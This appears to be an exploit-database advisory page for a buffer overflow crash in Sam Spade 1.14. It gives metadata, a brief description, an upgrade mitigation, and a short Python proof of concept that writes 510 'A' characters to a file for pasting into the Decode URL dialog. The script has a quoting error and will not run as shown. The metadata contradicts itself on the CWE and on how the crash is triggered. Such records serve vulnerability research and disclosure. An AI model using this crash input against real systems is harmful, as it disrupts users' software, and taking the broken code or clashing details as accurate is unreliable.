Sam Spade 1.14 Decode URL Buffer Overflow Crash PoC

vendor:

Sam Spade

by:

Vivek Mahajan - c3p70r

7,5

CVSS

HIGH

Denial of Service / Proof Of Concept/ Memory Overwrite

119

CWE

Product Name: Sam Spade

Affected Version From: 1.14

Affected Version To: 1.14

Patch Exists: Yes

Related CWE: N/A

CPE: a:sam_spade:sam_spade

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP2, Windows 7 SP1 x64, Windows 8.1 x64 PRO, Windows 10 x64

2015

Sam Spade 1.14 Decode URL Buffer Overflow Crash PoC

A buffer overflow vulnerability exists in Sam Spade 1.14 when a maliciously crafted file is opened. This can lead to a denial of service or memory overwrite.

Mitigation:

Upgrade to the latest version of Sam Spade to mitigate this vulnerability.

Source

Exploit-DB raw data:

#!/usr/bin/env python
# Exploit Title     : Sam Spade 1.14 Decode URL Buffer Overflow  Crash PoC
# Discovery by      : Vivek Mahajan - c3p70r
# Discovery Date    : 19/11/2015
# Vendor Homepage   : http://samspade.org
# Software Link     : http://www.majorgeeks.com/files/details/sam_spade.html
# Tested Version    : 1.14
# Vulnerability Type: Denial of Service / Proof Of Concept/ Memory Overwrite
# Tested On     : Windows XP SP2 ,Windows 7 SP1 x64, Windows 8.1 x64 PRO, Windows 10 x64
# Crash Point   : Go to Tools > Decode URL> Enter the contents of 'spade.txt' > OK , Note: Do Remove the http://



buffer = "A"*510

file = open("spade.txt, 'w')
file.write(buffer)
file.close()
            

# Follow on twitter @vik.create